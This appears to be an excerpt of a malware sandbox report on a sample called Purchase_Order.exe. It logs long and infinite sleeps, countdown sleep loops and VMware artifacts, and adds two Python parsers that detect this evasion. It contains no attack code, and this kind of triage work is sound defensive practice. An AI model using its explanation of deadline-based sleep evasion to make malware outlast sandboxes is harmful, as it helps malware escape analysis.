Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237219 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236094 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234703 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234047 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233781 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233375 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233266 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233141 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233016 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232797 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232688 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232563 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232438 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232078 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231469 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Purchase_Order.exe Window / User API: threadDelayed 2691 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Window / User API: threadDelayed 5275 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5376 Thread sleep time: -101499s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231469s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4772 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 4580 Thread sleep time: -44000s >= -30000s Jump to behavior
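The two lists above describe the same sleeps twice: the delay values are milliseconds (240000 is 4 min, matching the ">= 3 min" signature), and the "-Ns >= -30000s" lines repeat them as negative relative intervals against the sandbox's 30 s threshold. Two things in the data matter for triage. 922337203685477 is (2^63 - 1) / 10000, the millisecond count of a .NET TimeSpan.MaxValue, i.e. an effectively infinite wait. And the run 240000, 239844, 239656, ... shrinks by only 100 to 200 ms per call, which is consistent with the sample recomputing the remaining time from a fixed deadline after each sleep, so a sandbox that shortens individual sleeps does not shorten the overall wait. The parser below is an added example, not report or vendor code; the sample lines are copied from this section and the thresholds and rule names are this example's own.

```python
import re
from collections import defaultdict

LONG_SLEEP_MS = 180_000            # the report's ">= 3 min" signature threshold
SANDBOX_SLEEP_MS = 30_000          # the report's "-30000s" comparison value
INFINITE_MS = 2**31 - 1            # above Int32.MaxValue: not an honest Sleep(ms)
TIMESPAN_MAX_MS = (2**63 - 1) // 10000   # == 922337203685477, .NET TimeSpan.MaxValue
COUNTDOWN_STEP_MS = 1_000          # max shrink between sleeps still counted as a countdown

SLEEP_RE = re.compile(
    r"^Source: (?P<proc>\S+)(?: TID: (?P<tid>\d+))? Thread "
    r"(?:delayed: delay time: (?P<ms>\d+)|sleep time: -(?P<neg>\d+)s)"
)

# Lines copied from the report; the last one is not a sleep and must be ignored.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239531 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239422 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5376 Thread sleep time: -101499s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4772 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 4580 Thread sleep time: -44000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Window / User API: threadDelayed 2691 Jump to behavior
""".strip().splitlines()


def parse_sleep_events(lines):
    """Yield (process basename, tid or None, milliseconds) for both notations."""
    for line in lines:
        m = SLEEP_RE.match(line.strip())
        if not m:
            continue
        ms = int(m.group("ms") or m.group("neg"))
        yield m.group("proc").rsplit("\\", 1)[-1], m.group("tid"), ms


def is_countdown(values, min_len=3):
    """True when min_len consecutive sleeps each shrink by at most
    COUNTDOWN_STEP_MS: remaining time is recomputed from a deadline."""
    run = 1
    for prev, cur in zip(values, values[1:]):
        if prev > cur and prev - cur <= COUNTDOWN_STEP_MS:
            run += 1
            if run >= min_len:
                return True
        else:
            run = 1
    return False


def analyze_sleep_events(lines):
    """Per-process sleep summary with the evasion indicators above."""
    per_proc = defaultdict(list)
    for proc, _tid, ms in parse_sleep_events(lines):
        per_proc[proc].append(ms)
    report = {}
    for proc, values in per_proc.items():
        finite = [v for v in values if v <= INFINITE_MS]
        r = {
            "sleeps": len(values),
            "infinite_waits": len(values) - len(finite),
            "timespan_max_sentinel": TIMESPAN_MAX_MS in values,
            "long_sleeps": sum(v >= LONG_SLEEP_MS for v in finite),
            "over_30s": sum(v >= SANDBOX_SLEEP_MS for v in finite),
            "total_ms": sum(finite),
            "countdown": is_countdown(finite),
        }
        r["evasive"] = bool(r["infinite_waits"] or r["long_sleeps"] or r["over_30s"] or r["countdown"])
        report[proc] = r
    return report


if __name__ == "__main__":
    for proc, r in analyze_sleep_events(REPORT_LINES).items():
        print(proc, r)
```

The countdown flag is the one worth keeping in a rule: a single long sleep is defeated by sleep patching, but a deadline loop is only defeated by advancing the clock the loop reads.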
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239531 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239422 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238891 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238750 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238406 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238297 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237563 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237219 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236094 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234703 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234047 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233781 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233375 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233266 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233141 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233016 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232797 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232688 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232563 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232438 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232078 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 101499 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231469 Jump to behavior
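The delay values above are milliseconds. The first one, 922337203685477, is (2^63 - 1) // 10000: the largest relative interval NtDelayExecution can encode (2^63 - 1 hundred-nanosecond units), so that thread never wakes on its own. The rest count down from 240000 ms (four minutes) in steps of roughly 100 to 200 ms, consistent with the thread re-arming its wait for whatever remains of a fixed deadline each time a shortened sleep returns, which is why the report notes that execution stopped while the process was sleeping. The script below is an added example, not part of the report: it parses lines in the report's own format (the embedded sample lines are copied from above), recognises the sentinel, flags sleeps against the three-minute threshold the report itself uses, and finds countdown runs. The "Thread sleep time: -Ns" lines carry the negative relative-interval convention of NtDelayExecution and their magnitudes match the millisecond delay values (for example -232078 against 232078), so the parser reads them as milliseconds despite the "s" suffix; that unit reading and the ten-minute sandbox budget are assumptions of this example.

```python
import re
from typing import Dict, List, Tuple

# (2^63 - 1) hundred-nanosecond units expressed in milliseconds: the largest
# relative interval NtDelayExecution can encode, i.e. a wait that never expires.
INT64_MAX_MS = (2 ** 63 - 1) // 10_000  # 922337203685477

# Constructed sample: lines copied from the report above, in its own format.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232078s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4772 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239531 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 101499 Jump to behavior
"""

DELAY_RE = re.compile(r"^Source: (?P<proc>\S+) Thread delayed: delay time: (?P<ms>\d+)")
# Assumption: the "-Ns" magnitude is milliseconds; it matches the delay values above.
SLEEP_RE = re.compile(r"^Source: (?P<proc>\S+) TID: (?P<tid>\d+) Thread sleep time: -(?P<ms>\d+)s")


def parse_delays(text: str) -> List[Tuple[str, int]]:
    """(process, milliseconds) for every 'Thread delayed' line, in report order."""
    return [(m["proc"], int(m["ms"]))
            for m in map(DELAY_RE.match, text.splitlines()) if m]


def parse_sleeps(text: str) -> List[Tuple[str, int, int]]:
    """(process, thread id, milliseconds) for every 'Thread sleep time' line."""
    return [(m["proc"], int(m["tid"]), int(m["ms"]))
            for m in map(SLEEP_RE.match, text.splitlines()) if m]


def classify_delay(ms: int, long_ms: int = 180_000) -> str:
    """'infinite' for the INT64_MAX sentinel, 'long' at or above long_ms
    (three minutes, the report's own threshold), otherwise 'short'."""
    if ms >= INT64_MAX_MS:
        return "infinite"
    return "long" if ms >= long_ms else "short"


def countdown_runs(values: List[int], max_step: int = 1_000) -> List[Tuple[int, int]]:
    """(start_index, length) of each run of two or more values where every value
    is smaller than the previous one by at most max_step ms: the thread keeps
    re-arming its wait for the time left until a fixed deadline."""
    runs, i = [], 0
    while i < len(values):
        j = i
        while j + 1 < len(values) and 0 < values[j] - values[j + 1] <= max_step:
            j += 1
        if j > i:
            runs.append((i, j - i + 1))
        i = j + 1
    return runs


def summarize(text: str, sandbox_budget_ms: int = 600_000) -> Dict[str, object]:
    """How much wall-clock time the sample asked for versus what the sandbox will
    give it (ten minutes by default: an assumption, not the report's setting)."""
    delays = [ms for _, ms in parse_delays(text)]
    kinds = {k: sum(1 for ms in delays if classify_delay(ms) == k)
             for k in ("infinite", "long", "short")}
    finite_total = sum(ms for ms in delays if classify_delay(ms) != "infinite")
    return {
        "delay_lines": len(delays),
        "sleep_lines": len(parse_sleeps(text)),
        "by_kind": kinds,
        "finite_total_ms": finite_total,
        "exceeds_budget": kinds["infinite"] > 0 or finite_total > sandbox_budget_ms,
        "countdown_runs": countdown_runs(delays),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Run against the full list above, countdown_runs reports one long run from 240000 down to 231953, a break at 101499, and a second run from 231828 down; the sum of the finite delays alone is well over a quarter of an hour, which is what makes the "execution stops while process was sleeping" verdict reliable rather than a timing accident.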
Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
